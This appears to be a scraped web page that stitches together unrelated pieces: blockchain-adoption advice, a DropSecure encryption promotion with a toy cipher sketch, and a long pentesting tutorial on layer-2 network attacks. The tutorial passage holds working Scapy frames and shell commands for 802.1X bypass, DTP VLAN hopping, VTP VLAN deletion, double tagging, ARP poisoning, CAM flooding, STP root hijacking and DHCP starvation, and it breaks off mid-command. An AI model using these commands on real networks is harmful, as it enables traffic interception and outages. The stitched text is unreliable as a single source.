There’s no “one size fits all” with blockchain. Right now, given DLTs nascent maturity, it’s difficult to know how well any individual solution will perform. It’s unlikely we’ll soon see a solution that works perfectly straight out of the box. You’ll need to invest in customization to create the right process for your business needs.
These steps can help plan your best-fit blockchain strategy.
The right tools for the job
Consider the process you want blockchain to automate. It should be iterative, involve many parties, and it shouldn’t include data that needs to be modified or deleted. If it doesn’t fit these criteria, blockchain and DLT isn’t the right tech.
Start the journey with small steps
So you decide to launch on blockchain. Like other big IT projects, plan the rollout in stages to test and fine-tune. Keep in mind that DLT is most powerful at handling large-scale processes. You may not get immediate cost savings from a solution for one department, even if it works smoothly, but you can start small to test how it works. Then take the next step – scale to counterparties working with that department. Then get bigger by adding external suppliers.
Even with blockchain, you still need to pay attention to cybersecurity
Blockchain is more secure than many other enterprise data solutions, but it’s not bullet-proof to cyberattacks. You’ll need an endpoint cybersecurity solution on all corporate devices accessing the blockchain, which should be assessed with a third-party cybersecurity provider.
Audit your smart contracts. A vulnerable or inconsistent contract may lead to an expensive problem to fix down the line.
By deploying blockchain, you’re establishing a new IT infrastructure in your organization. A vulnerability could lead to an attack and penetration of your corporate network. So new software and servers need protecting. Always use firewalls and install server cybersecurity tools to run scans, encrypt data and renew licenses. Finally, run a penetration test to reveal weak spots.
All parties in your blockchain must apply the same level of security. Agree on common security policies with participants; it may be tricky due to different security practices but otherwise, your data and systems are at risk.
There’s no doubt: blockchain will revolutionize how companies collaborate for the better. But as with most new tech, pay attention to how you can best protect your data.
What is Encryption?
These days, many companies claim to have products that are “end-to-end encrypted”. This is often misleading. There is standard web encryption, often referred to as “client-to-server” (C2S) encryption, and then there is true end-to-end (E2E) encryption. The difference between C2S and E2E is the difference between communicating privately and letting someone monitor everything you send and receive.
C2S encryption providers process and store your unencrypted data on cloud servers. Many of these companies abuse your trust by spying on your data, and in some cases even manipulating your actions. In other words, these service providers sit in the middle between senders and recipients with full access to our data and communications.
In the case of E2E encryption, the service providers have no access to your data. In E2E (one “end” is the sender and the other “end” is the recipient), encryption (locking) is performed locally on the sender’s device, and the data gets decrypted (unlocked) only on the receiver’s device. That means the data remains encrypted throughout the transfer process.
The most important point from a security point of view is that the lock and the key are never together at any point in the transfer process. That means no intermediary has any possibility of gaining access to your data or communication. Embracing truly E2E encrypted solutions can insulate you from data breach risks and remove the possibility of intermediaries tampering with or monitoring your data.
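To make the lock-and-key picture concrete, here is a toy model of the E2E property: the key is generated on the sender's device and never travels with the data, so an intermediary that relays the ciphertext learns nothing. A SHA-256 counter keystream stands in for AES-256 so the sketch needs only the standard library; real products use a vetted cipher such as AES-256-GCM.

```python
# Toy model of end-to-end encryption. The 256-bit key is generated on the
# "sender's device" and is the only thing that can unlock the data; the
# relaying server only ever sees ciphertext. The SHA-256 counter keystream
# is a stand-in for AES-256, used here purely for a stdlib-only sketch.
import secrets, hashlib

def keystream(key: bytes, length: int) -> bytes:
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:length]

def xor_cipher(key: bytes, data: bytes) -> bytes:
    # XOR with the keystream; applying it twice restores the plaintext.
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))

key = secrets.token_bytes(32)              # 256-bit key, made client-side
message = b"confidential contract"
ciphertext = xor_cipher(key, message)      # all the server ever relays
assert ciphertext != message               # intermediary sees only this
assert xor_cipher(key, ciphertext) == message   # recipient holds the key
```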
What is End-to End Encryption with DropSecure?
Our end-to-end encryption is enabled using randomly generated AES 256-bit symmetric keys on your computer.
Every file you store, share or send via DropSecure is enabled with unique end-to-end encryption technology. In addition, every new file version saved on the DropSecure platform automatically regenerates a fresh encryption key. So you can be assured that every file is encrypted in real-time, using military grade algorithms before it leaves your device and cannot be decrypted until the recipient safely downloads the file at their end.
This article is intended for security specialists operating under a contract; all information provided in it is for educational purposes only. Neither the author nor the Editorial Board can be held liable for any damages caused by improper usage of this publication. Distribution of malware, disruption of systems, and violation of secrecy of correspondence are prosecuted by law.
The main goal of an attacker is to gain access to computer network resources or disrupt the normal network operation (i.e. cause a denial of service). In most cases, attacks at the data link layer are delivered simultaneously to raise the exploitation efficiency. For instance, the attack causing a content-addressable memory overflow in a switch creates ideal conditions for traffic interception, an attack on the DTP protocol enables the attacker to escape to another VLAN and compromise VLAN segments, etc.
Data-link layer attacks can be divided into three types:
- MITM. An attacker ‘stands in the middle’ between network devices and intercepts traffic without visible attack signs for legitimate hosts on the network;
- DoS. An attacker delivers a destructive attack on network equipment to disable it. In pentesting studies, such attacks are less practical and are suitable only as a deceptive maneuver in red-teaming; and
- unauthorized access to network segments. Using protocol flaws, an attacker can unpredictably gain access to inaccessible parts of the network. This type includes DTP VLAN hopping and double tagging attacks.
Disclaimer and toolkit
The data link layer offers numerous vectors for denial of service attacks. Prior to using them in a pentesting study, make sure to coordinate your steps with the customer! In production, delivery of DoS attacks is a very special thing. In my opinion, they are most useful in red-teaming as a maneuver to distract the blue team.
I am going to use the following tools:
- Yersinia – a framework for L2 attacks and stress tests of computer networks;
- Scapy – a Python module for manipulations with network packets. It can be used both as a sniffer and a packet injector; and
- FENRIR – a framework designed to bypass 802.1X protection on Ethernet networks.
How to bypass 802.1X
IEEE 802.1X is an end-user authentication and authorization standard at the data link layer. It supports access control and prevents devices from connecting to the local network without a special authorization procedure. This mechanism significantly increases the security level on the local network by preventing unauthorized connections. For pentesters, 802.1X can pose a major problem.
MAC authentication bypass
This 802.1X bypassing technique is very simple. MAB is used against devices that don’t support 802.1x authentication. In other words, MAC authorization is performed. MAB is very easy to bypass. You just find some legitimate device, write down its MAC address, and assign this MAC address to the network interface of the attacking PC. Then you connect to the switch and get access to the network. I won’t demonstrate this attack since it’s too simple.
The bridge-based attack is the most popular and effective way to bypass 802.1X. To implement it, you have to place your device between a legitimate client that has passed 802.1X authentication and the switch. The switch acts as the authenticator and provides connectivity between the client and the authentication server.
Too bad, this attack has a limitation. To use it in production, you need a legitimate device that has passed the 802.1X authentication. It can be a printer, an IP phone, or an employee’s laptop.
To demonstrate this attack, I will use the FENRIR tool.
First, I switch physical interfaces to the promiscuous mode:
c0ldheim@PWN:~$ sudo ifconfig eth0 promisc
c0ldheim@PWN:~$ sudo ifconfig eth1 promisc
Then I run FENRIR and specify the IP address of the legitimate device, its MAC address, and the two interfaces of my attacking PC. In real-life conditions, you can gain all this information by listening to the traffic. The interface looking towards the legitimate device will act as hostIface; the interface looking towards the switch, as netIface. After that, I create a bridge called FENRIR:
c0ldheim@PWN:~$ sudo python2 Interface.py
FENRIR > set host_ip 10.1.1.3
FENRIR > set host_mac 50:00:00:04:00:00
FENRIR > set hostIface eth1
FENRIR > set netIface eth0
FENRIR > create_virtual_tap
The newly created bridge must be configured. I switch it to the promiscuous mode and assign the desired IP address, taking into account the subnet mask. Finally, I add the default route via the FENRIR interface:
c0ldheim@PWN:~$ sudo ifconfig FENRIR promisc
c0ldheim@PWN:~$ sudo ifconfig FENRIR 10.1.1.50 netmask 255.255.255.0
c0ldheim@PWN:~$ sudo route add default gw 10.1.1.254 FENRIR
The run command in the FENRIR console launches the attack:
FENRIR > run
Success! I gained access to the network and can continue network reconnaissance to find neighbors in this network. I run an ARP scan using netdiscover.
Let’s see whether a path to the router is available.
After the exploitation, the legitimate host retains its connection and has access to the Internet.
CDP x LLDP
Dumping CDP/LLDP traffic has a significant impact because the attacker gets plenty of information about the network device: from its model to the duplex type. Information extracted from a CDP/LLDP traffic dump is extremely useful to the attacker. For instance, it can be used to determine the switch firmware version. If it has a known vulnerability, then the attacker can exploit it.
By sending a huge number of CDP messages, an attacker can cause a denial of service on a Cisco switch. The switch’s CPU becomes completely overloaded, while the CDP neighbors table starts overflowing. The attack is quite simple, so I won’t spend much time on it.
To deliver this attack, I will use Yersinia. I need the “flooding CDP table” option: it will cause an avalanche-like and very fast flood of CDP frames; these frames will overload the switch’s CPU, thus making normal network operation impossible.
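At the byte level, the frames Yersinia floods with ride in the same LLC/SNAP envelope discussed later for DTP, only with a different Cisco protocol ID (0x2000 for CDP versus 0x2004 for DTP). The sketch below only builds the header bytes for study; it does not craft a full CDP payload or send anything on the wire.

```python
# Byte-level sketch of the LLC/SNAP envelope that carries Cisco CDP
# advertisements to the 01:00:0C:CC:CC:CC multicast address. Only the
# header is assembled here, for illustration; nothing is transmitted.
import struct

CISCO_MULTICAST = bytes.fromhex("01000ccccccc")  # 01:00:0C:CC:CC:CC

def llc_snap_header(pid: int) -> bytes:
    llc = bytes([0xAA, 0xAA, 0x03])      # DSAP, SSAP, control
    snap = bytes([0x00, 0x00, 0x0C])     # Cisco OUI
    snap += struct.pack("!H", pid)       # protocol ID distinguishes CDP/DTP/VTP
    return llc + snap

cdp = llc_snap_header(0x2000)            # CDP
dtp = llc_snap_header(0x2004)            # DTP (used later in this article)
assert cdp[:3] == b"\xaa\xaa\x03"
assert cdp[-2:] == b"\x20\x00" and dtp[-2:] == b"\x20\x04"
```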
Attacking VLAN networks
Dynamic trunking and escape to other VLAN segments
This attack is applicable only to Cisco switches. The idea is to forcibly switch a port to the trunk channel mode. The DTP protocol is responsible for automatic trunking on Cisco switches. By default, all ports on a Cisco switch are in DTP Dynamic Auto mode. This means that the port will wait for a trunk initiation from a neighboring port. After sending a specially crafted DTP Desirable frame, the attacker will be able to jump to any VLAN and view traffic of all VLANs.
I will use Scapy to assemble a DTP Desirable frame. First, I import the module required to work with the DTP protocol:
>>> from scapy.contrib.dtp import *
Then I assemble an 802.3 Ethernet frame; the source MAC address will be randomized, while the destination MAC address will be the L2 multicast address 01:00:0C:CC:CC:CC.
The multicast address 01:00:0C:CC:CC:CC is used not only by the DTP protocol, but also by CDP, VTP, PAgP, and UDLD. To let the switch tell these advertisements apart even though they share one multicast address, a unique value is implemented for each of them in the SNAP header at the LLC (Logical Link Control) level. For DTP, this value is 0x2004.
At the LLC/SNAP layer, the value 0x2004 indicates that this is the DTP protocol. In tlvlist, the default header values can be kept, except for DTPNeighbor. At the end, I loop the operation sending out the assembled frame: it will be sent every three seconds. This is because the port was configured dynamically, and its lifetime is only 300 seconds (i.e. 5 minutes).
>>> mymac = RandMAC()
>>> dtp_frame = Dot3(src=mymac, dst="01:00:0C:CC:CC:CC")
>>> dtp_frame /= LLC(dsap=0xaa, ssap=0xaa, ctrl=3)/SNAP(OUI=0x0c, code=0x2004)
>>> dtp_frame /= DTP(tlvlist=[DTPDomain(),DTPStatus(),DTPType(),DTPNeighbor(neighbor=mymac)])
>>> sendp(dtp_frame, iface="eth0", inter=3, loop=1, verbose=1)
For some reason, the default DTP frame in Scapy stores all values required to assemble a DTP Desirable frame. I don’t know yet why, but in this particular case, it’s an advantage that saves my time. Accordingly, I leave the default DTP parameters (with the exception of DTPNeighbor).
The most important headers and their values are as follows:
- DTPType = '\xa5' – header value indicating the use of 802.1Q encapsulation; and
- DTPStatus = '\x03' – header value indicating the status of the DTP frame. This status is Desirable; it’s required to initiate the trunk mode on the port.
After this attack, you can see traffic of all VLANs. The performed network reconnaissance has detected VLANs 100, 200, 220, and 250. These VLAN ID values are located in one of the headers of the STP protocol: Root Identifier (Root Bridge System ID Extension).
Now it’s time to create virtual VLAN interfaces, activate them, and request addresses via DHCP. As a result, you’ll be able to communicate with all hosts in all VLANs.
c0ldheim@PWN:~$ sudo vconfig add eth0 100
c0ldheim@PWN:~$ sudo vconfig add eth0 200
c0ldheim@PWN:~$ sudo vconfig add eth0 220
c0ldheim@PWN:~$ sudo vconfig add eth0 250
c0ldheim@PWN:~$ sudo ifconfig eth0.100 up
c0ldheim@PWN:~$ sudo ifconfig eth0.200 up
c0ldheim@PWN:~$ sudo ifconfig eth0.220 up
c0ldheim@PWN:~$ sudo ifconfig eth0.250 up
c0ldheim@PWN:~$ sudo dhclient -v eth0.100
c0ldheim@PWN:~$ sudo dhclient -v eth0.200
c0ldheim@PWN:~$ sudo dhclient -v eth0.220
c0ldheim@PWN:~$ sudo dhclient -v eth0.250
VTP injections and manipulations with VLAN databases
The VTP protocol was developed to manage VLAN databases on Cisco switches automatically and on a centralized basis. It uses configuration revision numbers that help the switch to determine the most recent VLAN database, receive VTP advertisements, and update the VLAN DB when it sees a higher revision number.
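The revision-number logic described above can be sketched in plain Python. This is only an illustrative model of the decision a switch makes; the function and field names are not real VTP packet fields:

```python
# Sketch of the check a VTP client performs when it receives a
# Summary Advertisement (simplified; names are illustrative).

def should_accept_update(local_domain, local_revision, adv_domain, adv_revision):
    """Accept a VLAN database update only if the advertisement comes from
    the same VTP domain and carries a strictly higher revision number."""
    if adv_domain != local_domain:
        return False
    return adv_revision > local_revision

# A forged advertisement with a higher revision number is accepted,
# which is exactly what a VTP injection attack exploits.
print(should_accept_update("CORP", 5, "CORP", 42))   # attacker's bogus update: True
print(should_accept_update("CORP", 5, "OTHER", 42))  # wrong domain: False
```

This is also why VTP Transparent switches (revision number pinned to zero, advertisements merely relayed) are immune to the injection.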
In the VTP domain, switches can play the following roles:
- VTP Server. A switch acting as a VTP Server can create new VLANs, delete old ones, or change information inside VLANs. It also generates VTP advertisements for the rest of the domain members;
- VTP Client. In this capacity, the switch receives special VTP advertisements from other switches in the domain in order to update its VLAN databases. Clients have a limited ability to create VLANs and don’t even have the permission to change the VLAN configuration locally (i.e. have read-only access); and
- VTP Transparent. In this mode, the switch doesn’t participate in VTP processes and can perform full and local administration of the entire VLAN configuration. In the transparent mode, switches only transmit VTP advertisements from other switches without affecting their VLAN configurations. Such switches always have a revision number of zero, and VTP injection attacks cannot be delivered against them.
Advertisement types in the VTP domain:
- Summary Advertisement – a VTP advertisement sent by the VTP server every 300 seconds (5 minutes). This advertisement contains the VTP domain name, protocol version, timestamp, and MD5 hash of the configuration;
- Subset Advertisement – a VTP advertisement sent every time the VLAN configuration is changed; and
- Advertisement Request – a request from a VTP client to a VTP server for a Subset Advertisement message. It is usually sent in response to a Summary Advertisement that the switch has discovered with a higher configuration revision number.
To attack a VTP domain, the port you are connected to must be in the trunk mode. Attacking VTP can therefore be the next step after you’ve attacked the DTP protocol and your port has become a trunk link. An attacker can make VTP injections and send allegedly ‘updated’ VLAN databases with higher revision numbers. As a result, legitimate switches will accept them and update their VLAN databases. Using Yersinia, I will show how to deliver an attack on VTPv1 and delete all VLANs.
Yersinia will generate special VTP advertisements of the Summary Advertisement type.
As you can see, after the attack, all VLANs created by the user have been deleted. VLAN 1 and VLANs in the range 1002-1005 were not deleted because they are always created by default.
Double tagging attack
The double tagging attack exploits 802.1Q encapsulation features in Ethernet networks. In most cases, switches execute only one layer of 802.1Q decapsulation. This opens the way for exploitation, since it enables the pentester to hide a second 802.1Q tag in an Ethernet frame.
Attack details are as follows:
- The attacker assembles an Ethernet frame with two tags and sends it towards the switch. The VLAN ID of the first 802.1Q tag must match the Native VLAN of the port operating in the trunk mode. For convenience, imagine that the first 802.1Q tag is VLAN 1; while the second 802.1Q tag is VLAN 100;
- The frame is received by switch SW 1. The switch checks the first four bytes of the 802.1Q tag. The switch sees that the frame is intended for VLAN 1, and VLAN 1 in its configuration is the Native VLAN. Switch SW1 destroys this tag. Concurrently, the second VLAN 100 tag remains intact and doesn’t disappear; and
Native VLAN is a special VLAN, and the switch associates all frames without an 802.1Q tag with it. The default Native VLAN ID is 1.
- Switch SW2 checks only the internal 802.1Q tag and sees that the frame is intended for VLAN 100. This switch sends the frame to the port that belongs to VLAN 100, and the frame reaches its destination.
I will use Scapy to assemble an Ethernet broadcast frame with two 802.1Q tags. To visualize how the frame reaches its destination and responds to the spoofed ICMP request, an ICMP layer will be added. Then I send this request – allegedly, from the Nefarian PC whose IP address is 10.10.200.1.
>>> frame = Ether(dst="FF:FF:FF:FF:FF:FF")
>>> first_DOT1Q_tag = Dot1Q(vlan=1)
>>> second_DOT1Q_tag = Dot1Q(vlan=100)
>>> ip_packet = IP(src="10.10.200.1", dst="10.10.100.1")
>>> icmp_layer = ICMP()
>>> crafted = frame / first_DOT1Q_tag / second_DOT1Q_tag / ip_packet / icmp_layer
>>> sendp(crafted, iface="eth0", count=40, loop=0, verbose=1)
As you can see, the packet has reached the destination host, but with only one VLAN ID 100 tag (because the first VLAN 1 tag was destroyed by the first SW1 switch). Note that this is a single-direction attack. It can be useful when you attack the DMZ segment in the course of a pentesting study.
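The tag-stripping behavior that makes this attack work can be modeled in a few lines of plain Python. This is a simplified sketch: a real frame carries the 802.1Q tag between the MAC addresses and the EtherType, which is omitted here:

```python
import struct

TPID = 0x8100  # 802.1Q Tag Protocol Identifier

def push_tag(payload: bytes, vlan_id: int) -> bytes:
    # Prepend a 4-byte 802.1Q tag: TPID followed by the TCI (VID in low 12 bits).
    return struct.pack("!HH", TPID, vlan_id & 0x0FFF) + payload

def strip_native_tag(frame: bytes, native_vlan: int) -> bytes:
    # Model of the first switch: if the outer tag matches the Native VLAN,
    # remove it and forward the rest untouched.
    tpid, tci = struct.unpack("!HH", frame[:4])
    if tpid == TPID and (tci & 0x0FFF) == native_vlan:
        return frame[4:]
    return frame

inner = push_tag(b"payload", 100)        # hidden tag: VLAN 100
double = push_tag(inner, 1)              # outer tag: Native VLAN 1
forwarded = strip_native_tag(double, 1)  # SW1 strips only the outer tag
# 'forwarded' still carries the VLAN 100 tag, so SW2 delivers it into VLAN 100
```

The single decapsulation pass is the whole trick: the first switch never looks past the outer tag.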
Network reconnaissance and traffic interception with ARP
The ARP protocol can be extremely useful in network reconnaissance. An ARP scan enumerates active hosts and has a slight advantage over ICMP scans because ICMP traffic can be restricted or even disabled on a corporate network.
The problem with ARP scanning is that this network reconnaissance technique is very ‘noisy’. When using it, it’s important to make sure that you don’t alarm IPS/IDS security systems. In addition, Storm Control on the port you are connected to can be configured to block the port when it sees abnormal broadcast traffic (ARP relies on broadcasts).
Using ARPScanner.py, you can identify active hosts on the 10.1.1.0/24 network and their MAC addresses. In my case, the test network is small, but still…
c0ldheim@PWN:~$ sudo python3 ARPScanner.py -t 10.1.1.0/24 -i eth0
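As a side note, the list of candidate targets such a scanner iterates over can be generated with Python’s standard ipaddress module (ARPScanner.py is the article’s own script; this snippet only shows the enumeration step):

```python
import ipaddress

# Enumerate the usable host addresses an ARP scan of 10.1.1.0/24 would probe.
network = ipaddress.ip_network("10.1.1.0/24")
targets = [str(host) for host in network.hosts()]  # excludes network/broadcast

print(len(targets))               # 254 usable addresses
print(targets[0], targets[-1])    # 10.1.1.1 10.1.1.254
```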
ARP cache poisoning
This network attack exploits weaknesses of the ARP protocol. Any host on the network can send and receive ARP messages without any authentication (the ARP protocol has no authentication mechanism), so all hosts trust each other. The attacker sends bogus ARP responses to target A and target B: through these forged responses, the attacker’s computer is positioned as target A for target B and vice versa, squeezing itself into the middle. This creates conditions for traffic interception.
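To illustrate what a forged reply looks like on the wire, here is a hedged sketch that builds a raw ARP reply payload per RFC 826; the MAC and IP values are made up for the example:

```python
import struct

def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    # ARP payload for Ethernet/IPv4: htype=1, ptype=0x0800,
    # hlen=6, plen=4, opcode=2 (reply).
    header = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)
    return header + sender_mac + sender_ip + target_mac + target_ip

attacker_mac = bytes.fromhex("aabbccddeeff")
# Tell target B (10.1.1.5) that 10.1.1.2 now lives at the attacker's MAC.
packet = build_arp_reply(attacker_mac, bytes([10, 1, 1, 2]),
                         bytes.fromhex("112233445566"), bytes([10, 1, 1, 5]))

opcode = struct.unpack("!H", packet[6:8])[0]
print(opcode)  # 2 -> ARP reply; nothing in the packet proves who sent it
```

Nothing in that 28-byte payload authenticates the sender, which is the entire weakness being exploited.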
The picture below shows how ARP cache poisoning works.
To implement this attack, I have to switch my interface to the promiscuous mode and enable forwarding between interfaces. Otherwise, the two hosts will lose connectivity between themselves: the traffic will go via my PC without forwarding between interfaces.
c0ldheim@PWN:~$ ifconfig eth0 promisc
c0ldheim@PWN:~$ sudo sysctl -w net.ipv4.ip_forward=1
Using the script ARPSpoofer.py, I launch the ARP poisoning process. As the first target, I specify a Windows PC whose IP address is 10.1.1.2; as the second one, an FTP server whose address is 10.1.1.5.
c0ldheim@PWN:~$ sudo python3 ARPSpoofer.py -t1 10.1.1.2 -t2 10.1.1.5 -i eth0
After that, I can start listening to the network traffic.
Content-addressable memory overflow on a switch
Sometimes, this attack is referred to as MAC address table overflow. The idea is to overflow the switch’s content-addressable memory (CAM) table. As a result, the switch turns into a ‘hub’ and starts sending incoming frames out of all ports, providing ideal conditions for traffic interception. Causing such an overflow is very easy because the size of MAC address tables on switches is limited. If the MAC address table is full, the attacker can see all frames sent from all ports.
I will use Scapy to demonstrate this attack. A randomized MAC address will be used as the source MAC address (i.e. each new generated frame will have a new MAC address). The same applies to destination MAC addresses.
Next, using the sendp
method, I send malicious Ethernet frames. By setting loop
, I loop the operation sending out these frames.
>>> malicious_frames = Ether(src=RandMAC(), dst=RandMAC())
>>> sendp(malicious_frames, iface="eth0", loop=1, verbose=1)
MAC address table on the switch before the attack:
CoreSW#show mac address-table count
Mac Entries for Vlan 1:---------------------------
Dynamic Address Count : 3
Static Address Count : 0
Total Mac Addresses : 3
Total Mac Address Space Available: 7981
MAC address table on the switch after the attack:
CoreSW#show mac address-table count
Mac Entries for Vlan 1:---------------------------
Dynamic Address Count : 7981
Static Address Count : 0
Total Mac Addresses : 7981
Total Mac Address Space Available: 7981
Once the MAC address table is full, the switch will flood incoming frames out of all its ports, hub-style.
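The flooding behavior can be illustrated with a toy model of a capacity-limited MAC address table; the class and the tiny capacity value are purely illustrative:

```python
FLOOD = "all-ports"

class CamTable:
    """Toy model of a switch MAC address table with a fixed capacity."""
    def __init__(self, capacity):
        self.capacity = capacity
        self.table = {}  # MAC -> port

    def learn(self, mac, port):
        # A full table silently stops learning new source MACs.
        if mac in self.table or len(self.table) < self.capacity:
            self.table[mac] = port

    def forward(self, dst_mac):
        # An unknown destination forces the frame out of every port.
        return self.table.get(dst_mac, FLOOD)

sw = CamTable(capacity=3)
for i in range(10):              # attacker floods random source MACs
    sw.learn(f"rand-{i}", port=7)
sw.learn("victim", port=2)       # table is full: the victim is never learned
print(sw.forward("victim"))      # -> "all-ports"
```

Real switches hold thousands of entries (7981 in the output above), but the mechanics are the same: fill the table and every legitimate host becomes an “unknown destination”.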
STP root hijacking
How STP works
STP is required to ensure fault tolerance of a computer network at the data link layer. It blocks redundant links to avoid a broadcast storm on the network. In my opinion, STP is an outdated L2 fault-tolerance technique, especially given the existence of link aggregation and the Storm Control technology.
When an STP topology is assembled, a special root switch (i.e. root bridge) is assigned. Its selection is based on a special priority value (by default, it’s 32768). All switches in the STP domain have the same value; therefore, the choice is determined by adding together the following parameters:
- priority value 32768; and
- MAC address of the switch.
The switch whose MAC address is lower becomes the root switch. Network device manufacturers assign MAC addresses to their products in sequence: the older the device, the lower its MAC address. As a result, some ancient switch often becomes the root switch in production! 🙂 Of course, this adversely affects the network bandwidth.
After selecting the root switch, the remaining switches select ports that look towards the root switch. They are used for traffic forwarding. Then ports that will be blocked at the logical level are selected. This is how STP prevents the formation of a switching ring that causes a broadcast storm.
But if a new switch whose priority is lower than the priority of the current root switch suddenly appears in the STP domain, a new root switch must be selected. In other words, legitimate network traffic can be intercepted by changing the STP topology.
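The election rule is simply “lowest (priority, MAC) pair wins”, which can be sketched as follows; the bridge names and addresses mirror the lab topology, but the code itself is illustrative:

```python
# STP root election sketch: the bridge ID is compared as (priority, MAC),
# lowest wins. An attacker advertising a tiny MAC hijacks the root role.
def elect_root(bridges):
    return min(bridges, key=lambda b: (b["priority"], b["mac"]))

bridges = [
    {"name": "SW1",  "priority": 32769, "mac": "5000.0008.0000"},
    {"name": "SW2",  "priority": 32769, "mac": "5000.0009.0000"},
    {"name": "evil", "priority": 32769, "mac": "0000.0000.0011"},
]
print(elect_root(bridges)["name"])  # -> "evil"
```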
First, I switch my physical interfaces to the promiscuous mode, create a bridge called br-evil, and assign two interfaces, eth0 and eth1, to this bridge:
c0ldheim@PWN:~$ sudo ifconfig eth0 promisc
c0ldheim@PWN:~$ sudo ifconfig eth1 promisc
c0ldheim@PWN:~$ sudo brctl addbr br-evil
c0ldheim@PWN:~$ sudo brctl addif br-evil eth0
c0ldheim@PWN:~$ sudo brctl addif br-evil eth1
c0ldheim@PWN:~$ sudo ifconfig br-evil promisc
c0ldheim@PWN:~$ sudo ifconfig br-evil up
Then I enable traffic forwarding between the interfaces.
c0ldheim@PWN:~$ sudo sysctl -w net.ipv4.ip_forward=1
Scapy is required to assemble a special STP frame. I import the module required to work with L2 protocols.
>>> from scapy.layers.l2 import *
Then I assemble the required STP frame with the lowest MAC address values in the src, rootmac, and bridgemac fields. Finally, I loop the operation, sending out this frame every 3 seconds:
>>> frame = Ether(src="00:00:00:00:00:11", dst="01:80:C2:00:00:00")
>>> frame /= LLC()/STP(rootmac="00:00:00:00:00:11", bridgemac="00:00:00:00:00:11")
>>> sendp(frame, iface="br-evil", inter=3, loop=1, verbose=1)
STP uses the multicast MAC address 01:80:C2:00:00:00 to broadcast TCN service messages.
After sending out the crafted frame, I see STP TCN messages. Switches in the STP domain use them to exchange service information with each other.
STP status on switch SW1 after the attack:
VLAN0001
  Spanning tree enabled protocol rstp
  Root ID    Priority    32769
             Address     5000.0007.0000
             Cost        4
             Port        1 (GigabitEthernet0/0)
             Hello Time  2 sec  Max Age 20 sec  Forward Delay 15 sec

  Bridge ID  Priority    32769  (priority 32768 sys-id-ext 1)
             Address     5000.0008.0000
             Hello Time  2 sec  Max Age 20 sec  Forward Delay 15 sec
             Aging Time  300 sec

Interface           Role Sts Cost      Prio.Nbr Type
------------------- ---- --- --------- -------- ----
Gi0/0               Root FWD 4         128.1    Shr
Gi0/1               Desg FWD 4         128.2    Shr
Gi0/2               Desg FWD 4         128.3    Shr
Gi0/3               Desg FWD 4         128.4    Shr
Gi1/0               Desg FWD 4         128.5    Shr
Gi1/1               Desg FWD 4         128.6    Shr
Gi1/2               Desg FWD 4         128.7    Shr
Gi1/3               Desg FWD 4         128.8    Shr
STP status on switch SW2 after the attack:
VLAN0001
  Spanning tree enabled protocol rstp
  Root ID    Priority    32769
             Address     5000.0007.0000
             Cost        8
             Port        1 (GigabitEthernet0/0)
             Hello Time  2 sec  Max Age 20 sec  Forward Delay 15 sec

  Bridge ID  Priority    32769  (priority 32768 sys-id-ext 1)
             Address     5000.0009.0000
             Hello Time  2 sec  Max Age 20 sec  Forward Delay 15 sec
             Aging Time  300 sec

Interface           Role Sts Cost      Prio.Nbr Type
------------------- ---- --- --------- -------- ----
Gi0/0               Root FWD 4         128.1    Shr
Gi0/1               Altn BLK 4         128.2    Shr
Gi0/2               Desg FWD 4         128.3    Shr
Gi0/3               Desg FWD 4         128.4    Shr
Gi1/0               Desg FWD 4         128.5    Shr
Gi1/1               Desg FWD 4         128.6    Shr
Gi1/2               Desg FWD 4         128.7    Shr
Gi1/3               Desg FWD 4         128.8    Shr
STP status on switch SW3 after the attack:
VLAN0001
  Spanning tree enabled protocol rstp
  Root ID    Priority    32769
             Address     5000.0007.0000
             Cost        4
             Port        1 (GigabitEthernet0/0)
             Hello Time  2 sec  Max Age 20 sec  Forward Delay 15 sec

  Bridge ID  Priority    32769  (priority 32768 sys-id-ext 1)
             Address     5000.000a.0000
             Hello Time  2 sec  Max Age 20 sec  Forward Delay 15 sec
             Aging Time  300 sec

Interface           Role Sts Cost      Prio.Nbr Type
------------------- ---- --- --------- -------- ----
Gi0/0               Root FWD 4         128.1    Shr
Gi0/1               Altn BLK 4         128.2    Shr
Gi0/2               Desg FWD 4         128.3    Shr
Gi0/3               Desg FWD 4         128.4    Shr
Gi1/0               Desg FWD 4         128.5    Shr
Gi1/1               Desg FWD 4         128.6    Shr
Gi1/2               Desg FWD 4         128.7    Shr
Gi1/3               Desg FWD 4         128.8    Shr
Now the traffic will go through my computer. For clarity purposes, I initiate ICMP requests from the computer whose IP address is 10.1.1.100 to the computer whose IP address is 10.1.1.200.
As you can see, such a relatively simple technique makes it possible to intercept traffic. Importantly, there are no visible signs of an attack for legitimate hosts.
VLAN ID enumeration
A captured STP frame makes it possible to understand which VLAN you are in. VLAN ID information is located in the Root Identifier header (Root Bridge System ID Extension). Its value is equivalent to the VLAN ID value on the port you are connected to.
DHCP starvation and spoofing
During this attack, you send a huge number of DHCPDISCOVER
messages to exhaust the address space on the DHCP server. The DHCP server responds to each request and issues an IP address. Once the address space is full, the DHCP server will no longer be able to serve new clients on its network by issuing IP addresses to them (i.e. a denial of service occurs).
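The exhaustion mechanics can be modeled with a toy address pool; this is a simplified sketch, since a real DHCP server also tracks lease times, DECLINEs, and the full DORA exchange:

```python
import ipaddress

class DhcpPool:
    """Toy DHCP server pool handing out addresses from one subnet."""
    def __init__(self, network):
        self.free = [str(h) for h in ipaddress.ip_network(network).hosts()]
        self.leases = {}  # client MAC -> leased IP

    def offer(self, client_mac):
        if not self.free:
            return None            # pool exhausted: denial of service
        ip = self.free.pop(0)
        self.leases[client_mac] = ip
        return ip

pool = DhcpPool("10.1.1.0/24")
for i in range(254):               # one DISCOVER per spoofed source MAC
    pool.offer(f"mac-{i}")
print(pool.offer("legit-client"))  # -> None: a real client gets nothing
```

Each spoofed DISCOVER carries a fresh MAC, so the server sees 254 distinct “clients” and hands out its entire range.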
Let’s test this attack on a small local network. The DHCP server is already configured on the GW router. Subnet: 10.1.1.0/24.
Using Scapy, I start sending bogus DHCPDISCOVER
messages. The broadcast addresses are used as the destination MAC address and destination IP address. I have to add the UDP protocol layer since DHCP uses it. In the options
template, I indicate that I will send DHCP packets of the DISCOVER
type. And at the end, I loop the infinite flood of generated frames.
>>> malicious_dhcp_discover = Ether(src=RandMAC(), dst="FF:FF:FF:FF:FF:FF")
